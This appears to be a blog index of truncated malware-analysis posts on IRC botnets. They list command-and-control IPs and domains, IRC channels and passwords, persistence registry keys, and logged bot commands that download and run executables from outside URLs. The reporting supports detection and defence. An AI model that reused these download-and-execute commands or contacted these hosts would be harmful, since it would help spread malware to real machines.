xx.enterhere.biz/xx.nadnadzz.info/xx.ka3ek.com(large botnet)

Uncategorized

xx.enterhere.biz xx.nadnadzz.info xx.ka3ek.com for port have a look on the blog Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwarebcrypt “i” = [REG_DWORD, value: 000007D9] HKEY_CURRENT_USERSoftwarebcrypt “i” = [REG_DWORD, value: 000007D9] HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Windows Logon Application” = C:WINDOWSsystem32winIogon.exe Reads HKEY_CURRENT_USERSoftwarebcrypt “i” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCryptography “MachineGuid” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTFSystemShared “CUAS” HKEY_CURRENT_USERKeyboard LayoutToggle “Language Hotkey” HKEY_CURRENT_USERKeyboard LayoutToggle “Layout Hotkey” HKEY_LOCAL_MACHINESOFTWAREMicrosoftCTF “EnableAnchorContext”Read more...

88.255.120.175

Uncategorized

Remote Host Port Number 88.255.120.175 7075 MODE [USA|XP|324449] -ix JOIN #heur heur NICK [USA|XP|324449] USER rcccgtw * 0 :COMPUTERNAME PASS heur * The following port was open in the system: Port Protocol Process 1053 TCP csrs.exe (%Windir%csrs.exe) Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Services = “csrs.exe” so thatRead more...

217.23.8.169

Uncategorized

Remote Host Port Number 217.23.8.169 6667 USER {New}{UserName|v3}866 {New}{UserName|v3}866 * :{New}{UserName|v3}866 NICK {New}{UserName|v3}866 PRIVMSG #b0tz : 5 > * The following port was open in the system: Port Protocol Process 1054 TCP [file and pathname of the sample #1] Registry Modifications * The newly created Registry Values are: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + Windows Services = “%UserProfile%svchost.exe”Read more...

216.66.78.116

Uncategorized

Remote Host Port Number 206.188.193.39 80 216.66.78.116 6567 MODE [SH|USA|00|P|33762] -ix JOIN #salvando# c1rc0s0leil PRIVMSG #salvando# :[Dl]: File download: 117.7KB to: c:windowswichin.exe @ 117.7KB/sec. PRIVMSG #salvando# :[Dl]: Created process: “c:windowswichin.exe”, PID: PONG Google.Rules.Com NICK [SH|USA|00|P|33762] USER XP-9702 * 0 :COMPUTERNAME Now talking in #salvando# Topic On: [ #salvando# ] [ .desfi http://www.johngarzon.com.co/menu/xd/wichin.exe c:windowswichin.exe 1 ]Read more...

port.sistr.net

Uncategorized

port.sistr.net 72.8.130.112 i3ED6D120.versanet.de 62.214.209.32 Opened listening TCP connection on port: 113 * C&C Server: 72.8.130.112:7575 * Server Password: * Username: 32761086 * Nickname: [Ko]XP[Syn]79782 * Channel: #raw (Password: ) * Channeltopic: Registry Changes by all processes Create or Open Changes HKEY_CURRENT_USERSoftwareWinRAR SFX “C%%windows%systen32” = C:windowssysten32 HKEY_CURRENT_USERSoftwaremIRC “DateUsed” = 1263408663 HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallmIRC “DisplayName” = mIRC HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallmIRC “UninstallString”Read more...

190.3.183.13

Uncategorized

Remote Host Port Number 190.3.183.13 43000 208.78.70.70 80 72.233.89.197 80 NICK {00-USA-XP-COMP-7111} NICK {iNF-00-USA-XP-COMP-9111} USER Wendy * 0 :COMP JOIN #SVR# ERROR PASS scary * The following ports were open in the system: Port Protocol Process 1052 TCP lcacc.exe (%System%lcacc.exe) 1053 TCP lcacc.exe (%System%lcacc.exe) 1054 TCP lcacc.exe (%System%lcacc.exe) 26717 TCP lcacc.exe (%System%lcacc.exe) Registry Modifications *Read more...

asp.ukbues.su (very large botnet)

Uncategorized

DNS Lookup Host Name IP Address 0 127.0.0.1 193.104.27.98 193.104.27.98 UDP Connections Remote IP Address: 127.0.0.1 Port: 1042 Send Datagram: 2 packet(s) of size 1 Recv Datagram: 2 packet(s) of size 1 Download URLs http://193.104.27.98/2krn.bin (193.104.27.98) Outgoing connection to remote server: 193.104.27.98 TCP port 80 DNS Lookup Host Name IP Address dell-d3e62f7e26 10.1.10.2 10.1.10.1 10.1.10.1Read more...

88.255.120.174

Uncategorized

88.255.120.174:7575 chann #im .start heur .dl.start http://www.ccpraa.com/zur.exe C:zur.exe 1 .dl.start http://www.ccpraa.com/ecran.exe C:ecran.exe 1 .dl.start http://www.ccpraa.com/erh.exe C:erh.exe 1 .dl.start http://www.ccpraa.com/32f.exe C:32f.exe 1